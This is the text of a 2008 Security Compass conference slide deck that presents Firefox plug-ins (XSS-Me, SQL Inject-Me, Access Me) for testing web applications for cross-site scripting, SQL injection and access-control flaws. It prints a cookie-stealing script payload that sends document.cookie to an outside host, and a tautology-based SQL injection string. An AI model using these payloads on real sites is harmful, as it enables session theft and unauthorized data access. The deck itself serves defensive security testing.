© 2008 Security Compass inc. © 2008 Security Compass inc. 1

Firefox Plug-ins for Application Penetration Testing

Exploit-Me

© 2008 Security Compass inc.

• Tom Aratyn–Software Developer at Security

Compass–Developed the Exploit Me tools

Who are we?

2

© 2008 Security Compass inc.

• Jamie–Security Consultant for Security

Compass–Background in security research,

penetration testing, and software development

Who are we?

3

© 2008 Security Compass inc.

• Cross-site scripting, really a danger?

• State of web application security• XSS-Me• SQL Inject-Me• Access Me

Agenda

4

© 2008 Security Compass inc.

• We know XSS can be dangerous, but can we use it to rob a bank?–AJAX + CSRF + XSS = Major

problem

XSS – Really a Danger?

5

© 2008 Security Compass inc.

• Reflected–Spit back as soon as it goes in–XSS-Me helps here

• Stored–Saving it for someone else–XSS-Me future version

Two Exciting Flavours

6

© 2008 Security Compass inc.

• Un-validated user input executed by the users computer

• JavaScript is typically used–PDF files are XSS-able

• Someone took my cookie

What is this XSS Stuff

7

<SCRIPT>location.href=“http://10.1.1.1/cgi-bin/steal.cgi?”+

escape(document.cookie);</SCRIPT>

<SCRIPT>location.href=“http://10.1.1.1/cgi-bin/steal.cgi?”+

escape(document.cookie);</SCRIPT>

© 2008 Security Compass inc.

• AJAX is adding a new element into these attacks–AJAX was used in the IBDBank

attack• Attacker can play with data as if

the victim is doing it–Send–Receive–Parse

Someone Changed my App

8

© 2008 Security Compass inc.

State of Web App Insecurity

9

• Web app exploits outnumber buffer overflows in CVE

• Large portion of web apps suffer from XSS or SQL Injection

© 2008 Security Compass inc.

• Various tools exist–OWASP tools,

commercial, Open Source

• Work very well–For what they

were built to do

Testing Tools

10

© 2008 Security Compass inc.

• Most tools not for developers or QA

• Developers and QA must be checking for security vulnerabilities

• Need lightweight tools

The Missing Piece

11

© 2008 Security Compass inc.

• Firefox extension to test for cross-site scripting

XSS-Me 0.4 to the Rescue

12

© 2008 Security Compass inc.

• Pick forms & fields to test• Firefox 3• Import/export/add/remove XSS

strings• Test & Surf• Heuristics to limit tests

XSS-Me Features

13

© 2008 Security Compass inc.

• Checking all attacks against all fields is slow.–No, trust me, it’s slow

• Heuristic tests limit the fields we have to check by determining if we can inject them–Passes set of characters and

checks if they’re returned (;\/<>=‘”)

Heuristics?

14

© 2008 Security Compass inc.

• Attempts to set document.vulnerable=true into the DOM

• If property set, attack worked• Also checks for plain text string,

a potential vulnerability–OnMouseOver injection

Behind the Magic

15

© 2008 Security Compass inc.

• Everyone says use Struts to protect yourself–Sure, just don’t follow the supplied

examples

Thank $deity for Struts

16

© 2008 Security Compass inc.

Being Bobby

17

sql = “SELECT * FROM users WHERE username = ‘” & Request(“username”) & “’ AND password = '" & Request(“password”) & "'"

User Input:username = jimmypassword = blah’ OR ‘1’=‘1

SELECT * FROM users WHERE username = ‘jimmy’ AND password = ‘blah’ OR ‘1’=‘1’

Since “WHERE 1=1” is true for all records the entire table is returned!

Courtesy XKCD.com

© 2008 Security Compass inc.

• Defence is well known and faster than what you’re doing now–Prepared Statements–Stored Procedure

• Ok, if you use exec in your procedure this is also vulnerable, but, you’re not doing that right?

No Excuse

18

© 2008 Security Compass inc.

• Firefox extension to check for SQL injection

SQL Inject-Me 0.4

19

© 2008 Security Compass inc.

• Pick what you test• Configure attack and success

strings• Large default string set• Firefox 3• Test & Surf

SQL Inject-Me Features

20

© 2008 Security Compass inc.

• Web/application servers maybe vulnerable to HTTP Verb Tampering attacks

• Bypasses common authorization configurations

What’s your method

21

© 2008 Security Compass inc.

Access Me 0.2

22

• Firefox extension to check for authentication issues

© 2008 Security Compass inc.

• Checks for unauthenticated access vulnerabilities

• Checks for HTTP verb vulnerabilities

• Regular expression based parameter detection

• Automatic test as you surf

Access Me Features

23

© 2008 Security Compass inc.

Detecting Access Vulnerabilities

24

• Failed if response status is 200 and response too similar

• Warning if response status is 200 or response too similar

© 2008 Security Compass inc.

• Available off of our website–www.securitycompass.com

• Extra XSS-Me attack strings also available from site

• Open sourced under GPL v3

Where can you get ‘em

25

© 2008 Security Compass inc.

• May include–Spidering

• Stored attacks

The Future...

26

© 2008 Security Compass inc.

• Lets have ‘em– tom@securitycompass.com– jamie@securitycompass.com

Questions

27